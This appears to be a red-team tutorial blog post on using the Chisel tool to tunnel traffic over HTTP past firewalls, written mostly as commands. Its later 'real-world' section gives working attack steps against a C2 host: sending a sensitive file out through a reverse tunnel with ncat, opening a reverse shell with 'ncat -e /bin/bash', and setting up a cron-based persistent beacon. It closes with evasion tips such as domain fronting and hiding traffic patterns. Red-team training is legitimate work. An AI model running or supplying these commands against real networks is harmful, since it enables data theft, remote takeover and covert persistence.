Hey there, fellow hackers and pen testers! If you’re reading this article, you’re probably passionate about staying ahead in the game and mastering the tools that help us win big in cybersecurity. Today, I’ll be walking you through a powerful technique I’ve used in many red team engagements—tunneling traffic using Chisel, a lightweight tool that leverages HTTP to move SSH traffic across restricted networks.

Chisel is a fast, reliable, and versatile tool that can help us bypass firewalls, intrusion detection systems, and other security measures by tunneling our traffic over HTTP. It’s an invaluable resource when you’re on a red team engagement or just exploring the boundaries of a network.

In this article, we’ll explore the world of Chisel, its functionality, setup, and use cases. I’ll provide plenty of examples and code snippets along the way, and by the end of this article, you’ll be a Chisel expert, ready to tunnel your way to victory!

So, let’s dive in!

Understanding Chisel

Chisel is a powerful open-source tool for creating secure, encrypted tunnels between two systems. Developed by jpillora, Chisel is written in Go, making it easily portable across different platforms. At its core, Chisel is an SSH client and server that speaks HTTP, allowing it to traverse firewalls and security devices typically configured to allow HTTP traffic.

One of Chisel’s greatest strengths is its versatility. It supports forward and reverse tunnels and SOCKS5 proxying and can be easily combined with other tools like Metasploit, Cobalt Strike, and even custom payloads.

Before we delve into the installation and setup process, it’s essential to understand the main components of Chisel:

  • Chisel Server: The server component listens for incoming client connections and sets up tunnels based on the client’s requests. The server can be hosted on any system with a public IP address or a domain, making it ideal for use with cloud infrastructure providers like AWS, GCP, or Azure.
  • Chisel Client: The client component connects to the Chisel server and requests specific tunnels to be set up. The client can be run on any system, including the target machine, your local machine, or a system within the target network.

With these components in mind, let’s install and set up Chisel.

Chisel Installation and Setup

To install Chisel, visit the GitHub repository (https://github.com/jpillora/chisel) and download the latest binary release for your operating system. Chisel is available for Linux, macOS, and Windows.

After downloading the binary, make it executable by running the following command:

chmod +x chisel

Now, you should be able to run the Chisel binary by simply executing:

./chisel

Chisel Use Cases

Let’s look at four common ways Chisel can help in real-world red team scenarios:

Bypassing Firewall Restrictions

One of the most common use cases for Chisel is bypassing firewall restrictions. This can be helpful when a target network has strict outbound rules that prevent you from establishing connections to your command and control (C2) infrastructure. You can bypass these restrictions and maintain control of compromised systems by tunneling traffic through an allowed protocol like HTTP.

To bypass firewall restrictions with Chisel, first, set up the Chisel server on a publicly accessible system. Run the following command on the server:

./chisel server -p 8080 --reverse

Next, run the Chisel client on the target machine. The client will connect to the Chisel server and request a reverse tunnel:

./chisel client http://<server-ip>:8080 R:2222:localhost:22

Now, you can SSH into the target machine through the Chisel server:

ssh -p 2222 user@<server-ip>

Remote Port Forwarding

To use Chisel for remote port forwarding, first start the Chisel server:

./chisel server -p 8080

Next, on the target machine, run the Chisel client:

./chisel client http://<server-ip>:8080 8081:localhost:80

Now, access the target’s HTTP service:

curl http://<server-ip>:8081

Reverse Port Forwarding

To set up reverse port forwarding, run:

./chisel server -p 8080 --reverse

And on your local machine:

./chisel client http://<server-ip>:8080 R:8081:localhost:80

This lets systems on the target network access your local HTTP service:

curl http://localhost:8081

SOCKS Proxy

To use Chisel as a SOCKS5 proxy:

./chisel server -p 8080

Then on the target machine:

./chisel client http://<server-ip>:8080 --socks5

The SOCKS5 proxy will typically listen on localhost:1080 by default—note this in the client’s output.

On your local machine, install and configure proxychains:

sudo apt-get install proxychains

Edit /etc/proxychains.conf and add:

socks5 <server-ip> <socks5-port>

Then:

proxychains curl http://internal-website.local

Real-World Examples

Exfiltrating Data from a Restricted Network

Start the Chisel server:

./chisel server -p 8080 --reverse

On the target:

./chisel client http://<c2-ip>:8080 R:4444:localhost:4444

Then:

cat sensitive-data.txt | ncat -l -p 4444

On your C2 server:

ncat -v <c2-ip> 4444 > exfiltrated-data.txt

Gaining Access to an Internal Web Application

Server:

./chisel server -p 8080

Client:

./chisel client http://<server-ip>:8080 8081:internal-webapp.local:80

Access the app:

curl http://<server-ip>:8081

Establishing a Chisel Beacon for Persistent C2 Communication

Server:

./chisel server -p 8080 --reverse

Client:

./chisel client http://<c2-ip>:8080 R:8888:localhost:8888 --keepalive 5m

Server listener:

ncat -l -p 8888

Target command execution:

ncat -e /bin/bash <c2-ip> 8888

Periodic Chisel Beacon with Cron

Server:

./chisel server -p 8080 --reverse

Client cron job:

./chisel client http://<c2-ip>:8080 --reverse --timeout 30s

Crontab:

*/5 * * * * /path/to/chisel client http://<c2-ip>:8080 --reverse --timeout 30s >/dev/null 2>&1

Optional SOCKS proxy on server:

./chisel server -p 8080 --reverse --socks5

Tips and Tricks for Advanced Chisel Usage

  • Combine Chisel with Metasploit, Cobalt Strike, or custom payloads.
  • Use domain fronting for stealth via CDNs like Cloudflare.
  • Add authentication with --auth user:pass to prevent misuse.
  • Use stunnel to wrap Chisel in TLS for added encryption.
  • Watch for traffic patterns—avoid large data spikes or weird hours.

Conclusion

Chisel is a stealthy, lightweight, and versatile tunneling tool perfect for red team operations. Its ability to bypass firewall restrictions, forward and reverse ports, and create SOCKS proxies makes it an invaluable asset for offensive security work.

In this article, we covered Chisel installation, practical use cases, real-world scenarios, and advanced usage tips. Now that you’ve got Chisel in your toolbox, try setting up a lab and practicing these techniques in a safe environment!

Remember—use this knowledge ethically and legally. Stay sharp, and happy hacking!